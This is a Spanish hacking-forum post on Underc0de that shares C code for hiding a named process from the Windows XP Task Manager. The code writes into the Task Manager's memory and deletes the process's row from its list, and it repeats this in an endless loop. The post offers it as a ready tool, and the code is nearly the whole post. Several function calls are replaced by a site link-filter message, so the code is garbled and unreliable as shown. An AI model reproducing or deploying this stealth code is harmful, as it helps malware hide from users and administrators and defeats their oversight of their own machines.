comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Ocultar Proceso

  • 0 Respuestas
  • 1659 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5331
  • Actividad:
    58.33%
  • Reputación 30
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Mayo 22, 2011, 09:56:25 pm »
/*
[ Programa ]
Ocultar procesos al administrador de tareas (Task Manager) Sin inyeccion.
By Octalh
Testeado en Windows XP SP2
octalh@gmail.com
You are not allowed to view links. Register or Login
Código: C
  1. */
  2.  
  3. using namespace std;
  4.  
  5. LVITEM ItemLista, *_ItemLista;
  6. char item[512], subitem[512];
  7. char *_item, *_subitem;
  8. unsigned long pid;
  9. HANDLE HProceso;
  10. char ExeProc[50]; //Proceso a ocultar
  11.  
  12. BOOL CALLBACK PrOcultar(HWND hwnd,LPARAM lParam)
  13. {
  14.    char HLista[150] = "";
  15.    char HAdminT[150] = "";
  16.  
  17.    GetWindowText(hwnd,HAdminT,149);
  18.    GetClassName(hwnd,HLista,249);
  19.  
  20.    if (You are not allowed to view links. Register or Login(HAdminT,"Procesos") && You are not allowed to view links. Register or Login(HLista,"SysListView32") !=NULL)
  21.    /* Si encontramos la columna "Procesos" en el Taskmanager y la clase "SysListView32"
  22.       de la listvew
  23.    */
  24.    {
  25.       int count=(int)SendMessage(hwnd, LVM_GETITEMCOUNT, 0, 0); // Contamos los Items listados
  26.       int i;
  27.       GetWindowThreadProcessId(hwnd, &pid); //Obtenemos el Pid de cada Proceso listado como Item
  28.       HProceso=OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_READ|
  29.                       PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, pid);
  30.                       // Obtenemos el Hndle del proceso como Item de la Listvew
  31.  
  32.       _ItemLista=(LVITEM*)VirtualAllocEx(HProceso, NULL, sizeof(LVITEM),
  33.                                 MEM_COMMIT, PAGE_READWRITE); // Asiganos permisos de lectura y escritura al Listvew
  34.       _item=(char*)VirtualAllocEx(HProceso, NULL, 512, MEM_COMMIT,
  35.                                PAGE_READWRITE);
  36.       _subitem=(char*)VirtualAllocEx(HProceso, NULL, 512, MEM_COMMIT,
  37.                            PAGE_READWRITE); // Asiganos Lectura y Escritura en la region asiganda
  38.  
  39.       ItemLista.cchTextMax=512;
  40.       for(i=0; i<count; i++) { // Contamos cada Item en un Bucle
  41.            ItemLista.iSubItem=0;
  42.            ItemLista.pszText=_item;
  43.            WriteProcessMemory(HProceso, _ItemLista, &amp;ItemLista, sizeof(LVITEM), NULL);
  44.            SendMessage(hwnd, LVM_GETITEMTEXT, (WPARAM)i, (LPARAM)_ItemLista); // Obtenemos el nombre de cada Item (Proceso)
  45.            ItemLista.iSubItem=1; // Posicion de la columna en el listview
  46.            ItemLista.pszText=_subitem;
  47.            WriteProcessMemory(HProceso, _ItemLista, &amp;ItemLista, sizeof(LVITEM), NULL);
  48.            SendMessage(hwnd, LVM_GETITEMTEXT, (WPARAM)i, (LPARAM)_ItemLista);
  49.            ReadProcessMemory(HProceso, _item, item, 512, NULL);
  50.            ReadProcessMemory(HProceso, _subitem, subitem, 512, NULL);
  51.  
  52.           if (You are not allowed to view links. Register or Login(item,ExeProc) != NULL)  SendMessage(hwnd, LVM_DELETEITEM, (WPARAM)i, (LPARAM)_ItemLista);
  53.           // Si exise el Proceso a Ocultar, eliminamos el Item de la Listvew
  54.       }
  55.       VirtualFreeEx(HProceso, _ItemLista, 0, MEM_RELEASE); // Libreamos…
  56.       VirtualFreeEx(HProceso, _item, 0, MEM_RELEASE);
  57.       VirtualFreeEx(HProceso, _subitem, 0, MEM_RELEASE);
  58.       return FALSE;
  59.    }
  60.  
  61. return TRUE;
  62. }
  63.  
  64. int main(){
  65.    HWND fwindow;
  66.    You are not allowed to view links. Register or Login("%s","\n\n      Ocultar Procesos al Task Manager \n");
  67.    You are not allowed to view links. Register or Login("%s","\n                << By Octalh >>\n\n");
  68.    You are not allowed to view links. Register or Login("%s","     [ www.aztekmindz.org | octalh@gmail.com ]\n \n");
  69.    You are not allowed to view links. Register or Login("     Escribe el proceso que deseas ocultar: ");
  70.    You are not allowed to view links. Register or Login(ExeProc);
  71.    You are not allowed to view links. Register or Login("\n\n     Ocultando Proceso: [ %s ]",ExeProc);
  72.  
  73.    for(;;)
  74.    {
  75.       EnumChildWindows(FindWindow(0,"Administrador de tareas de Windows"),PrOcultar,0);
  76.    }
  77.  
  78.    return 0;
  79. }
« Última modificación: Febrero 08, 2014, 05:49:25 pm por Expermicid »


 

¿Te gustó el post? COMPARTILO!